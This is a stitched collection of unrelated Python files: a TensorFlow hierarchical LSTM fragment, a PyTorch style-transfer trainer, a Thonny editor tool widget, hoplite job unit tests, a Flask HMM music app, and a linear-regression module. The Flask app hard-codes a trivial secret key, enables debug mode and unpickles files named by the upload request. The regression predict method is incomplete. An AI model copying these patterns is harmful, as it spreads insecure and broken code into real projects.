                     'user_climate_hidden': None,
                     'user_area_climate': None,
                     'user_area_climate_hidden': None}
        self.is_training = True

    def set_configuration(self, his_len, dims, is_training):
        """Set the unroll length, the dimension table and the training flag."""
        self.his_len = his_len
        self.dims = dims
        self.is_training = is_training

    def __weights__(self, input_dim, output_dim, name, init=True, std=0.1, reg=None):
        """Create/fetch an [input_dim, output_dim] weight matrix.

        With init=True the variable gets a N(0, std) initializer and an
        optional regularizer; otherwise it is created/fetched with the
        scope defaults (used outside training).
        """
        if init:
            return tf.get_variable(name, shape=[input_dim, output_dim], initializer=tf.random_normal_initializer(0.0, std), regularizer=reg)
        else:
            return tf.get_variable(name, shape=[output_dim] if False else [input_dim, output_dim])

    def __bias__(self, output_dim, name, init=True):
        """Create/fetch an [output_dim] bias vector (initialized to 1.0)."""
        if init:
            return tf.get_variable(name, shape=[output_dim], initializer=tf.constant_initializer(1.0))
        else:
            return tf.get_variable(name, shape=[output_dim])

    def FeatureFusion(self, emb1, emb2, prev_emb2, dims, name, reuse=False):
        """
        Multi-step hierarchical fusion mechanism

        Projects the secondary stream (current and previous step) into the
        primary stream's space, averages each with emb1, then gates the
        concatenated result with a scalar attention score.

        Returns (out_logits, fused_emb, a_score).
        """
        dim_1 = dims[0]
        dim_2 = dims[1]
        with tf.variable_scope(name, reuse=reuse):
            self.W_cur = self.__weights__(dim_2, dim_1, name='Cur_weight', init=self.is_training)
            self.W_prev = self.__weights__(dim_2, dim_1, name='Prev_weight', init=self.is_training)
            self.Wa = self.__weights__(2*dim_1, 1, name='Attention_weight', init=self.is_training)
            f_cur = (emb1 + tf.matmul(emb2, self.W_cur)) / 2
            f_prev = (emb1 + tf.matmul(prev_emb2, self.W_prev)) / 2
            fused_emb = tf.concat([f_cur, f_prev], axis=-1)
            a_score = tf.matmul(fused_emb, self.Wa)
            out_logits = a_score * tf.nn.tanh(fused_emb)
            return out_logits, fused_emb, a_score

    def __LSTMUnit__(self, input_x, prev, prev_memory, dims, name, reuse=False):
        """
        LSTM unit

        Returns (current_hidden, current_memory).
        """
        input_dim = dims[0]
        output_dim = dims[1]
        with tf.variable_scope(name, reuse=reuse):
            self.Wi = self.__weights__(input_dim, output_dim, name='Input_weight_1', init=self.is_training)
            self.Ui = self.__weights__(output_dim, output_dim, name='Input_weight_2', init=self.is_training)
            self.bi = self.__bias__(output_dim, name='Input_bias', init=self.is_training)
            self.Wf = self.__weights__(input_dim, output_dim, name='Forget_weight_1', init=self.is_training)
            self.Uf = self.__weights__(output_dim, output_dim, name='Forget_weight_2', init=self.is_training)
            self.bf = self.__bias__(output_dim, name='Forget_bias', init=self.is_training)
            self.Wo = self.__weights__(input_dim, output_dim, name='Output_weight_1', init=self.is_training)
            self.Uo = self.__weights__(output_dim, output_dim, name='Output_weight_2', init=self.is_training)
            self.bo = self.__bias__(output_dim, name='Output_bias', init=self.is_training)
            self.Wc = self.__weights__(input_dim, output_dim, name='Global_weight_1', init=self.is_training)
            self.Uc = self.__weights__(output_dim, output_dim, name='Global_weight_2', init=self.is_training)
            self.bc = self.__bias__(output_dim, name='Global_bias', init=self.is_training)
            # input gate
            # BUGFIX: previously added self.bf (the forget bias) here while
            # self.bi was created but never used — a clear typo.
            I = tf.nn.sigmoid(tf.matmul(input_x, self.Wi) + tf.matmul(prev, self.Ui) + self.bi)
            # forget gate
            F = tf.nn.sigmoid(tf.matmul(input_x, self.Wf) + tf.matmul(prev, self.Uf) + self.bf)
            # output gate
            O = tf.nn.sigmoid(tf.matmul(input_x, self.Wo) + tf.matmul(prev, self.Uo) + self.bo)
            # candidate memory; NOTE(review): gates the previous hidden state
            # with F inside the tanh, deviating from the textbook LSTM —
            # kept as-is, presumably intentional.
            C_ = tf.nn.tanh(tf.matmul(input_x, self.Wc) + tf.matmul(F * prev, self.Uc) + self.bc)
            # new long-term memory
            Ct = F * prev_memory + I * C_
            # current information
            current_memory = Ct
            current = O * tf.nn.tanh(Ct)
            return current, current_memory

    def Cell(self, input_u, input_a, input_c, hiddens, reuse=False):
        """Run one time step of the full hierarchy.

        Level 1: one LSTM per raw stream; level 2: user+area and
        user+climate fusions fed to their own LSTMs; level 3: fusion of
        the two level-2 embeddings fed to the top LSTM. Returns the new
        state dict (same keys as *hiddens*) plus the attention scores.
        """
        prev_emb_u = hiddens['uh']
        prev_mem_u = hiddens['um']
        prev_emb_a = hiddens['ah']
        prev_mem_a = hiddens['am']
        prev_emb_c = hiddens['ch']
        prev_mem_c = hiddens['cm']
        prev_emb_ua = hiddens['uah']
        prev_mem_ua = hiddens['uam']
        prev_emb_uc = hiddens['uch']
        prev_mem_uc = hiddens['ucm']
        prev_emb_uac = hiddens['uach']
        prev_mem_uac = hiddens['uacm']
        with tf.variable_scope('HEBR_Cell'):
            cur_emb_u, cur_mem_u = self.__LSTMUnit__(input_u, prev_emb_u, prev_mem_u, dims=[self.dims['user'], self.dims['user_hidden']], name='User', reuse=reuse)
            cur_emb_a, cur_mem_a = self.__LSTMUnit__(input_a, prev_emb_a, prev_mem_a, dims=[self.dims['area'], self.dims['area_hidden']], name='Area', reuse=reuse)
            cur_emb_c, cur_mem_c = self.__LSTMUnit__(input_c, prev_emb_c, prev_mem_c, dims=[self.dims['climate'], self.dims['climate_hidden']], name='Climate', reuse=reuse)
            input_ua, fuse_ua, score_ua = self.FeatureFusion(cur_emb_u, cur_emb_a, prev_emb_a, dims=[self.dims['user_hidden'], self.dims['area_hidden']], name='User_Area_Fusion', reuse=reuse)
            input_uc, fuse_uc, score_uc = self.FeatureFusion(cur_emb_u, cur_emb_c, prev_emb_c, dims=[self.dims['user_hidden'], self.dims['climate_hidden']], name='User_Climate_Fusion', reuse=reuse)
            cur_emb_ua, cur_mem_ua = self.__LSTMUnit__(input_ua, prev_emb_ua, prev_mem_ua, dims=[self.dims['user_area'], self.dims['user_area_hidden']], name='User_Area', reuse=reuse)
            cur_emb_uc, cur_mem_uc = self.__LSTMUnit__(input_uc, prev_emb_uc, prev_mem_uc, dims=[self.dims['user_climate'], self.dims['user_climate_hidden']], name='User_Climate', reuse=reuse)
            input_uac, fuse_uac, score_uac = self.FeatureFusion(cur_emb_ua, cur_emb_uc, prev_emb_uc, dims=[self.dims['user_area_hidden'], self.dims['user_climate_hidden']], name='User_Area_Climate_Fusion', reuse=reuse)
            cur_emb_uac, cur_mem_uac = self.__LSTMUnit__(input_uac, prev_emb_uac, prev_mem_uac, dims=[self.dims['user_area_climate'], self.dims['user_area_climate_hidden']], name='User_Area_Climate', reuse=reuse)
        return {'uh': cur_emb_u,
                'um': cur_mem_u,
                'ah': cur_emb_a,
                'am': cur_mem_a,
                'ch': cur_emb_c,
                'cm': cur_mem_c,
                'uah': cur_emb_ua,
                'uam': cur_mem_ua,
                'uch': cur_emb_uc,
                'ucm': cur_mem_uc,
                'uach': cur_emb_uac,
                'uacm': cur_mem_uac,
                'uas': score_ua,
                'ucs': score_uc,
                'uacs': score_uac}

    def get_embedding(self, user_seq, area_seq, climate_seq):
        """Unroll the cell over his_len steps.

        Inputs are batch-major [batch, seq, features] tensors. Returns
        (emb_logits, attention_logits): the top-level embedding per step
        and the [ua, uc, uac] attention scores per step.
        """
        self.batch_size = tf.shape(user_seq)[0]
        # time major
        user_seq = tf.transpose(user_seq, [1, 0, 2])  # [seq_length * batch_size * n_features]
        area_seq = tf.transpose(area_seq, [1, 0, 2])
        climate_seq = tf.transpose(climate_seq, [1, 0, 2])
        # initial (zero) states for every level of the hierarchy
        hiddens = {'uh': tf.zeros([self.batch_size, self.dims['user_hidden']], dtype=tf.float32),
                   'um': tf.zeros([self.batch_size, self.dims['user_hidden']], dtype=tf.float32),
                   'ah': tf.zeros([self.batch_size, self.dims['area_hidden']], dtype=tf.float32),
                   'am': tf.zeros([self.batch_size, self.dims['area_hidden']], dtype=tf.float32),
                   'ch': tf.zeros([self.batch_size, self.dims['climate_hidden']], dtype=tf.float32),
                   'cm': tf.zeros([self.batch_size, self.dims['climate_hidden']], dtype=tf.float32),
                   'uah': tf.zeros([self.batch_size, self.dims['user_area_hidden']], dtype=tf.float32),
                   'uam': tf.zeros([self.batch_size, self.dims['user_area_hidden']], dtype=tf.float32),
                   'uch': tf.zeros([self.batch_size, self.dims['user_climate_hidden']], dtype=tf.float32),
                   'ucm': tf.zeros([self.batch_size, self.dims['user_climate_hidden']], dtype=tf.float32),
                   'uach': tf.zeros([self.batch_size, self.dims['user_area_climate_hidden']], dtype=tf.float32),
                   'uacm': tf.zeros([self.batch_size, self.dims['user_area_climate_hidden']], dtype=tf.float32),
                   'uas': None,
                   'ucs': None,
                   'uacs': None}
        emb_logits, attention_logits = [], []
        for i in range(self.his_len):
            # variables are created at step 0 and reused afterwards
            hiddens = self.Cell(user_seq[i], area_seq[i], climate_seq[i], hiddens, reuse=(i != 0))
            emb_logits.append(hiddens['uach'])
            attention_logits.append([hiddens['uas'], hiddens['ucs'], hiddens['uacs']])
        return emb_logits, attention_logits
<gh_stars>1-10
from net.tran import FeatureNet, TransformerNet
from net.tran import gram_matrix,batch_normalize
import torch as t
import torchvision as tv
from torch.nn import functional as F
from torch.utils.data import DataLoader
import tqdm
import matplotlib.pyplot as plt
import cv2
import numpy as np
# select the first GPU when available, otherwise fall back to CPU
device=t.device('cuda:0') if t.cuda.is_available() else t.device('cpu')
# mini-batch size for the content-image DataLoader
BATCH = 1
class TransModel():
    """Adversarial style-transfer trainer.

    A TransformerNet generator is trained against a second TransformerNet
    used as discriminator; a frozen FeatureNet (eval mode) provides
    perceptual features for the content loss.
    """
    def __init__(self):
        self.transformer = TransformerNet().to(device)
        # NOTE(review): the discriminator reuses the TransformerNet
        # architecture rather than a dedicated critic network.
        self.discriminator = TransformerNet().to(device)
        self.extracter = FeatureNet().eval().to(device)
        self.trans_lr = 2e-4
        self.dis_lr = 1e-3
        self.content_weight = 1
        self.style_weight = 1
        self.dis_weight = 1
        self.optimizer_trans = t.optim.Adam(self.transformer.parameters(), self.trans_lr)
        self.optimizer_dis = t.optim.Adam(self.discriminator.parameters(), self.dis_lr)
        self.epoches = 500
    def train(self,dataloader,style):
        """Alternate discriminator and generator updates over the dataset.

        Saves an intermediate stylised image under ./dump every 10 epochs.
        """
        for epoch in range(self.epoches):
            for i, (x, _) in enumerate(dataloader):
                # preprocess x: collapse to grayscale, replicated on 3 channels
                x = x.to(device)
                _,C,_,_ = x.shape
                if C == 3:
                    x = x.mean(axis=1)
                    x = t.stack((x,x,x),axis=1)
                elif C == 1:
                    x = x.squeeze(axis=1)
                    x = t.stack((x,x,x),axis=1)
                # train the discriminator: real = style image, fake = generator output
                y = self.transformer(x)
                real_loss = 1 - self.discriminator(style).mean()
                fake_loss = self.discriminator(y).mean()
                dis_loss = self.dis_weight * (real_loss+fake_loss)
                self.optimizer_dis.zero_grad()
                dis_loss.backward()
                self.optimizer_dis.step()
                # train the generator (fresh forward pass after the D update)
                y = self.transformer(x)
                # generator content loss: perceptual distance at relu2
                features_y = self.extracter(y)
                features_x = self.extracter(x)
                content_loss = self.content_weight * F.mse_loss(features_y.relu2, features_x.relu2)
                # generator style loss: the generator tries to fool the discriminator
                style_loss = 1 - self.discriminator(y).mean()
                style_loss = self.style_weight * style_loss
                trans_loss = content_loss + style_loss
                self.optimizer_trans.zero_grad()
                trans_loss.backward()
                self.optimizer_trans.step()
                print('epoch',epoch,'dis_loss',dis_loss.item(),'content_loss',content_loss.item(),'style_loss',style_loss.item())
            if epoch % 10 == 0:
                plt.figure()
                origin_img = x.data.cpu()[0].permute(1,2,0)
                style_img = style.cpu()[0].permute(1,2,0)
                new_img = y.data.cpu()[0].permute(1,2,0)
                plt.subplot(111)
                plt.imshow(new_img)
                plt.xticks([]),plt.yticks([])
                # intermediate results are written under ./dump
                plt.savefig('./dump/' + str(epoch/10) +'.png')
                plt.close()
    def stylise(self,content,style=None,save_path=None):
        """Stylise *content* with the trained generator and save to *save_path*."""
        pass
# ImageNet-style normalisation constants (normalisation itself is disabled below)
img_size = 512
img_mean = [0.485, 0.456, 0.406]
img_std = [0.229, 0.224, 0.225]
# content images: resize then centre-crop to a fixed square
myTransform = tv.transforms.Compose([
    tv.transforms.ToTensor(),
    tv.transforms.Resize(img_size),
    tv.transforms.CenterCrop(img_size),
    #tv.transforms.Normalize(mean=img_mean, std=img_std),
])
# style image: random crop for augmentation, then centre-crop
styleTransform = tv.transforms.Compose([
    tv.transforms.ToTensor(),
    tv.transforms.RandomCrop(img_size),
    tv.transforms.CenterCrop(img_size),
    #tv.transforms.Normalize(mean=img_mean, std=img_std),
])
# end-to-end training
dataset = tv.datasets.ImageFolder("/workspace/art/test_images", myTransform)
dataloader = DataLoader(dataset, BATCH)
style_path = 'images/Raphael_Project_image/6. 197x168.tiff'
style_image = tv.datasets.folder.default_loader(style_path)
style = styleTransform(style_image).unsqueeze(0).to(device)
trans = TransModel()
trans.train(dataloader,style)
# stylise the numbered test images and save the results
for i in range(1,10):
    content_path ='test_images/img/' + str(i) +'.jpg'
    content_image = tv.datasets.folder.default_loader(content_path)
    content = myTransform(content_image).unsqueeze(0).to(device)
    # NOTE(review): the trailing "|" below is a paste/extraction artifact
    trans.stylise(style,content,'results/' + str(i) + '.png') |
<reponame>beardad1975/thonny-pos
import tkinter as tk
from tkinter import ttk
from thonny.codeview import CodeViewText
from thonny.shell import ShellText
from thonny import get_workbench, get_shell
from ..base_postit import BaseCode, BasePost, BasePopup
from ..common import common_images
class ToolWidget(ttk.Frame):
    """Toolbar-style postit frame holding a single image button.

    Tool postits have no tab, so no tab-derived colours or fonts are
    applied here.
    """

    def widget_init(self, master, tool_name):
        """Remember the tool name, look up its shared image, and build
        the image button inside this frame."""
        self.tool_name = tool_name
        self.tool_image = common_images[tool_name]
        ttk.Frame.__init__(self, master)
        button_options = dict(
            relief='groove',
            borderwidth=0,
            compound='right',
            image=self.tool_image,
            padx=0,
            pady=0,
        )
        self.postit_button = tk.Button(self, **button_options)
        self.postit_button.pack(side=tk.LEFT, anchor='w')
class ToolCodeMixin:
    """Code-side behaviour for tool postits: they carry no code text."""

    def code_init(self):
        """Initialise empty code state and the postfix-enter flag."""
        # tk variable consumed by the shared postit machinery
        self.var_postfix_enter = tk.BooleanVar()
        self.var_postfix_enter.set(False)
        # tool postits insert no code of their own
        self.code_display, self.note, self.code = '', '', ''

    def update_postit_code(self):
        """Nothing to rebuild for a tool postit."""
class ToolPostMixin:
    """Applies a tool action (backspace/undo/redo/enter/indent/dedent),
    dispatching on self.tool_name, to either the editor or the shell."""
    def insert_into_editor(self, text_widget, selecting, dragging):
        """Perform this tool's action on the editor text widget.

        *selecting* — a selection exists; *dragging* — the postit was
        dragged onto the widget rather than clicked.
        """
        if self.tool_name == 'backspace':
            if not dragging:
                text_widget.event_generate("<BackSpace>")
            else: # dragging
                if selecting:
                    text_widget.event_generate("<BackSpace>")
                else:
                    # dropped without selection: delete the char left of the drop point
                    text_widget.delete(tk.INSERT + '-1c')
        elif self.tool_name == 'undo':
            text_widget.edit_undo()
        elif self.tool_name == 'redo':
            text_widget.edit_redo()
        elif self.tool_name == 'enter':
            if not dragging:
                if selecting :
                    # replace the selection with a newline
                    text_widget.event_generate("<BackSpace>")
                    text_widget.event_generate("<Return>")
                else : # not selecting
                    text_widget.event_generate("<Return>")
            else: # dragging
                if selecting:
                    text_widget.event_generate("<BackSpace>")
                    text_widget.event_generate("<Return>")
                else:
                    # plain newline without triggering auto-indent
                    text_widget.insert(tk.INSERT, '\n')
                    #stored_index = text_widget.index(tk.INSERT)
                    #text_widget.tag_remove(tk.SEL, '1.0')
                    #text_widget.mark_set(tk.INSERT, stored_index)
                    #text_widget.event_generate("<Return>")
        elif self.tool_name == 'indent':
            if not dragging:
                text_widget.indent_region()
            else: # dragging
                if selecting:
                    text_widget.indent_region()
                else:
                    # NOTE(review): tag_remove with SEL_FIRST/SEL_LAST in the
                    # no-selection branch — confirm this cannot raise TclError.
                    text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
                    text_widget.indent_region()
        elif self.tool_name == 'dedent':
            if not dragging:
                text_widget.dedent_region()
            else: # dragging
                if selecting:
                    text_widget.dedent_region()
                else:
                    text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
                    text_widget.dedent_region()
    def insert_into_shell(self, text_widget, selecting, dragging):
        """Perform this tool's action on the shell text widget.

        Edits are only allowed at or after the 'input_start' mark (the
        prompt); before it, the tools degrade to history navigation.
        """
        if text_widget.compare(tk.INSERT, '>=' , 'input_start'):
            if self.tool_name == 'backspace' and text_widget.compare(tk.INSERT, '>' , 'input_start'):
                # just bigger than, no equal than because of backspace del left char
                if not dragging:
                    if selecting:
                        if text_widget.compare(tk.SEL_FIRST, '>=', 'input_start'):
                            text_widget.event_generate("<BackSpace>")
                        elif text_widget.compare(tk.SEL_LAST, '>', 'input_start'):
                            # selection straddles the prompt: trim only the editable part
                            #print('so co')
                            text_widget.delete('input_start', tk.SEL_LAST)
                            text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
                            text_widget.mark_set(tk.INSERT, 'input_start')
                    else:
                        text_widget.event_generate("<BackSpace>")
                else: # dragging
                    if selecting:
                        text_widget.event_generate("<BackSpace>")
                    else:
                        text_widget.delete(tk.INSERT + '-1c')
            elif self.tool_name == 'undo':
                if text_widget.compare('input_start', '==','end-1c'):
                    # empty line
                    text_widget.event_generate("<Up>")
                else: # not empty line
                    text_widget.edit_undo()
            elif self.tool_name == 'redo':
                text_widget.edit_redo()
            elif self.tool_name == 'enter':
                if selecting:
                    text_widget.event_generate("<BackSpace>")
                    text_widget.event_generate("<Return>")
                else:# not selecting
                    text_widget.event_generate("<Return>")
            elif self.tool_name == 'indent':
                pass # when in shell
            elif self.tool_name == 'dedent':
                pass # when in shell
        else: # insert before input_start
            if self.tool_name == 'enter':
                text_widget.event_generate("<Return>")
            elif self.tool_name == 'backspace':
                # check if any selecting after input_start
                if text_widget.compare(tk.SEL_LAST, '>', 'input_start'):
                    text_widget.delete('input_start', tk.SEL_LAST)
                    text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
                    text_widget.mark_set(tk.INSERT, 'input_start')
            elif self.tool_name == 'undo':
                # before the prompt undo/redo walk the command history
                text_widget.event_generate('<Up>')
            elif self.tool_name == 'redo':
                text_widget.event_generate('<Down>')
class ToolPostit(ToolWidget,
                 ToolCodeMixin, BaseCode,
                 ToolPostMixin, BasePost,
                 BasePopup):
    """Tool postit assembled by composition: widget, code, post and popup
    behavior each come from a dedicated base/mixin class."""
    def __init__(self, master, tool_name):
        # Each *_init call initializes one collaborating base class; the
        # popup initialization is currently disabled.
        self.widget_init(master, tool_name)
        self.code_init()
        self.post_init()
        #self.popup_init()
<reponame>ni/hoplite
import time
from hoplite.builtin_plugins.constants import DOWNLOAD_NETWORK_FOLDER_JOB_NAME
from hoplite.utils import server_logging
from hoplite.server.jobs.job import Job, JobNotStartedError, NotAuthorizedError
from tests import HopliteTestCase
# Module-level logger used by the tests below (e.g. test_kill).
logger = server_logging.get_server_logger(__name__)
class TestJob(HopliteTestCase):
    """Unit tests for ``hoplite.server.jobs.job.Job``: construction,
    start/kill lifecycle, status updates and error reporting."""

    def setUp(self):
        super(TestJob, self).setUp()
        # A job with known uuid/name/config shared by most tests below.
        self.job = Job("{3939}", DOWNLOAD_NETWORK_FOLDER_JOB_NAME, { "path": "/path/to/something" }, "temp")

    def test_initialize(self):
        # assertEqual: assertEquals is a deprecated alias (removed in 3.12).
        self.assertEqual(self.job.uuid, "{3939}")
        self.assertEqual(self.job.name, DOWNLOAD_NETWORK_FOLDER_JOB_NAME)
        self.assertEqual(self.job.config, { "path": "/path/to/something" })
        self.assertEqual(self.job.running(), False)

    def test_start(self):
        self.job.start()
        self.assertTrue(self.job.running())
        self.job.kill()

    def test_finished_throws_if_job_not_started(self):
        with self.assertRaises(JobNotStartedError):
            self.job.finished()

    def test_finished(self):
        job = Job("No ID", self.test_jobs_module.constants.THROW_AN_EXCEPTION_JOB_NAME, { "No": "Config" }, "some_complex_key")
        job.start()
        while job.running():
            # Sleep instead of spinning, consistent with the other polls here.
            time.sleep(.01)
        self.assertTrue(job.finished())

    def test_to_dict(self):
        d = self.job.to_dict()
        self.assertEqual(d["uuid"], "{3939}")
        self.assertEqual(d["name"], DOWNLOAD_NETWORK_FOLDER_JOB_NAME)
        self.assertEqual(d["config"], { "path": "/path/to/something" })
        self.assertEqual(d["status"], {})
        self.assertFalse(d["running"])
        self.assertFalse(d["finished"])

    def test_returns_exception_information_in_status(self):
        config = {}
        job = Job("666", self.test_jobs_module.constants.THROW_AN_EXCEPTION_JOB_NAME, config, "api_key", entry_point_group_name='hoplite.test_jobs')
        job.start()
        while job.running():
            time.sleep(.01)
        exc_info = job.status()["exception"]
        traceback = None
        # Get to the bottom level of the exception information
        while ('type' not in exc_info) and (exc_info is not None):
            traceback = exc_info.get("traceback", None)
            exc_info = exc_info.get('previous_exception', None)
        self.maxDiff = None
        self.assertEqual(exc_info["type"], str(TypeError))
        self.assertEqual(exc_info["message"], "THE SKY IS FALLING!!")
        self.assertIsNotNone(traceback)

    def test_returns_status(self):
        self.assertEqual(self.job.status(), {})

    def test_updates_status(self):
        self.job.update_status(self.job._api_key, { "slave_ip": "10.2.13.123" })
        status = self.job.status()
        self.assertEqual(status, { "slave_ip": "10.2.13.123" })
        # Make sure it overwrites old key values
        self.job.update_status(self.job._api_key, { "slave_ip": "12.3.4.567" })
        status = self.job.status()
        self.assertEqual(status, { "slave_ip": "12.3.4.567" })

    def test_update_status_raises_on_invalid_api_key(self):
        self.assertRaises(NotAuthorizedError, self.job.update_status, "", {"Not": "Authorized"})

    def test_kill(self):
        job = Job("No ID", self.test_jobs_module.constants.WAIT_10_SECONDS_JOB_NAME, { "No": "Config" }, "temp_api_key")
        logger.info("Starting job")
        job.start()
        self.assertTrue(job.running())
        job.kill()
        start_time = time.time()
        while job.running():
            time.sleep(.01)
            if time.time() - start_time > 1:
                raise Exception("Job not killed in time")
        self.assertTrue(job.finished())
|
<filename>app.py
from flask import Flask, render_template, request, session
from flask_bootstrap import Bootstrap
import os
import numpy
import gui_logic as hmm
app = Flask(__name__)
bootstrap = Bootstrap(app)
# NOTE(review): hard-coded secret key is unsafe outside development --
# load it from the environment or configuration instead.
app.secret_key = "secret"
@app.route('/', methods = ['GET'])
@app.route('/index', methods = ['GET'])
def index():
    """Landing page: remember the chosen HMM flavor in the session and
    dispatch to the training or generation view based on query args."""
    if request.method == "GET":
        args = request.args
        hmm_type = args.get('hmm_type')
        session['type'] = hmm_type
        if args.get('train') == "train":
            result = render_template("train_hmm.html", link="/", type=hmm_type)
        elif args.get('generate') == "generate":
            result = render_template("music_generator.html", link="/", type=hmm_type)
        else:
            result = render_template("index.html")
    return result
@app.route('/train_hmm')
def train_hmm():
    """Render the model-training page."""
    return render_template("train_hmm.html", link="/")
@app.route('/music_generator')
def music_generator():
    """Render the music-generation page."""
    return render_template("music_generator.html", link="/")
@app.route('/sample', methods = ['POST'])
def sample():
    """Generate a music sample from a previously trained model.

    Expects a 'model' file field naming the pickled model and a
    'generator_framework' form field; the model family ('hmm' vs 'fhmm')
    comes from the session.  Renders the generator page with the resulting
    score image and midi file.
    """
    image = None
    midi = None
    # Renamed from ``type`` to avoid shadowing the builtin.
    model_type = session['type']
    framework = request.form.get('generator_framework')
    if request.method == "POST":
        model_name = request.files['model'].filename
        if model_type == "hmm":
            model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'hmm', model_name))
            image, midi = hmm.generate_sample_hmm(model, model_name, framework)
        else:
            model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'fhmm', model_name))
            image, midi = hmm.generate_sample_fhmm(model, model_name)
    # (leftover debug print removed)
    return render_template("music_generator.html", image=image, link="/", midi=midi, type=model_type)
@app.route('/train', methods = ['POST'])
def training():
    """Train an HMM or factorial HMM from the bundled Bach dataset.

    Reads hyperparameters from the POSTed form; the model family comes from
    the session ('type').  On success stores the trained model name and
    training-set size in the session and re-renders the training page.

    NOTE(review): ``framework`` is only bound in the "hmm" branch and ``M``
    only in the "fhmm" branch; the later uses are guarded by the same
    ``type`` check, so this relies on the session value not changing
    mid-request.  ``type`` and ``iter`` shadow builtins.
    """
    flag_test = False
    if request.method == "POST":
        parameters = request.form
        type = session['type']
        if type == "hmm":
            framework = parameters.get("framework")
            session['framework'] = framework
        else:
            # Number of factorial chains for the fhmm variant.
            M = int(parameters.get('m_value'))
        size = parameters.get("size")
        if size != "all":
            size = int(parameters.get("size"))
        iter = int(parameters.get("n_iter"))
        K = int(parameters.get("n_components"))
        if type == "hmm":
            trainset, testset, vocabs = hmm.init(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'), size, type)
            if framework == "hmml":
                obs_train, train_lengths = hmm.prepare_dataset(trainset)
                # Prepend one pseudo-sequence containing every vocabulary
                # symbol (shuffled) so hmmlearn sees all symbols at least once.
                obs_vocab = [numpy.array([[i] for i, _ in enumerate(vocabs)]).reshape(-1, 1)]
                numpy.random.shuffle(obs_vocab[0])
                train_lengths.insert(0, len(vocabs))
                obs_train = obs_vocab + obs_train
            else:
                obs_train = trainset
                train_lengths = None
            model, name = hmm.train_hmm(K, iter, len(vocabs), obs_train, train_lengths, size, framework)
        else:
            trainset, testset, vocabs = hmm.init(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'), size, type)
            D = len(vocabs)
            model, name = hmm.train_fhmm(D, M, K, iter, size, trainset)
        session['model'] = name
        session['size'] = size
        if model is not None:
            flag_test = True
    return render_template("train_hmm.html", link="/", flag = True, flag_test = flag_test, type = type)
@app.route('/test', methods = ['POST'])
def testing():
    """Evaluate the most recently trained model on a test set.

    Uses an uploaded 'testset' pickle when one is provided; otherwise the
    tail of the bundled Bach dataset (everything past the stored training
    size) is used as the held-out split.
    """
    model_name = session['model'] + '.pkl'
    size = session['size']
    type = session['type']
    infs = means = result = ""
    if type == "hmm":
        framework = session['framework']
        model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'hmm', model_name))
    else:
        model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'fhmm', model_name))
    if request.method == "POST":
        if request.files['testset'].filename != "":
            pkl = request.files['testset']
            testset = hmm.load_pickle(os.path.join(hmm.DATA_DIR, 'music21', pkl.filename))
        else:
            # Both model families share the same held-out split; the original
            # code duplicated this branch verbatim for "hmm" and "fhmm".
            dataset = hmm.load_pickle(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'))
            testset = dataset[size:]
        if type == "hmm":
            if framework == "hmml":
                obs_test, test_lengths = hmm.prepare_dataset(testset)
            else:
                obs_test = testset
            infs, means = hmm.test_hmm(model, obs_test, framework)
        else:
            result = hmm.test_fhmm(model, testset)
    return render_template("train_hmm.html", link="/", flag_test = True, infs = infs, means = means, result = result, type = type)
if __name__ == '__main__':
    # Development server only; debug=True must not be used in production.
    app.run(debug=True)
<filename>simpleml/linear_regression.py<gh_stars>0
import numpy as np
from abc import ABC
class BaseModel(ABC):
    """
    Abstract Model Class used as interface of all regression models.
    :param model: Stored model data (NumPy array in most cases)
    :type model: np.ndarray
    :param data: input data for training or testing
    :type data: np.ndarray
    :param labels: labels of the input data for training
    :type labels: np.ndarray

    NOTE(review): fit/predict are plain no-op methods rather than
    ``@abstractmethod``, so the base class is instantiable -- confirm
    whether that is intended.
    """
    def __init__(self):
        # Subclasses populate this in fit(); None means "not fitted yet".
        self.model = None
    def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
        """
        :param data: input data for training
        :type data: np.ndarray
        :param labels: labels of the input data for training
        :type labels: np.ndarray
        """
        pass
    def predict(self, data: np.ndarray):
        """
        :param data: input data for testing
        :type data: np.ndarray
        :return: predicted data
        :rtype: np.ndarray
        """
        pass
class ConstantModel(BaseModel):
    """
    Constant model class that predicts the training-label average for every
    input point.
    :param model: Stored model data (the scalar label mean after fit)
    :type model: np.ndarray
    :param data: input data for training or testing
    :type data: np.ndarray
    :param labels: labels of the input data for training
    :type labels: np.ndarray
    """
    def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
        """
        Fit the model by storing the mean of the training labels; the input
        features are ignored by this baseline.
        :param data: input data for training (unused)
        :type data: np.ndarray
        :param labels: labels of the input data for training
        :type labels: np.ndarray
        :return: None
        """
        self.model = labels.mean()
    def predict(self, data: np.ndarray) -> np.ndarray:
        """
        Return the stored label mean for every input point.
        :param data: input data for testing
        :type data: np.ndarray
        :return: predicted data (constant vector, one entry per input row)
        :rtype: np.ndarray
        """
        # np.full allocates the constant vector directly instead of the
        # previous np.ones(...) * mean (one pass instead of two).
        return np.full(len(data), self.model)
class LinearRegression(BaseModel):
    """
    Linear regression model class that uses the following model for predictions:
    .. math::
        y = \\omega*X
    """
    def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
        """
        Method for fitting the training data and determining and storing the model parameters :math:`\\omega`.
        :param data: input data for training
        :type data: np.ndarray
        :param labels: labels of the input data for training
        :type labels: np.ndarray
        :return: None
        """
        if len(data.shape) == 1:
            # Single feature: closed form w = (x.y) / (x.x).
            w = data.T.dot(labels) / data.T.dot(data)
        else:
            # Multiple features: normal equations w = (X^T X)^-1 X^T y.
            w = np.linalg.inv(data.T.dot(data)).dot(data.T).dot(labels)
        self.model = w
    def predict(self, data: np.ndarray) -> np.ndarray:
        """
        Given the input data it returns the predicted output for each input point using the model, in this case:
        .. math::
            y = X\\omega
        :param data: input data for testing
        :type data: np.ndarray
        :return: predicted data
        :rtype: np.ndarray
        """
        if np.ndim(self.model) == 0:
            # Scalar weight from the single-feature fit: plain scaling.
            return self.model * data
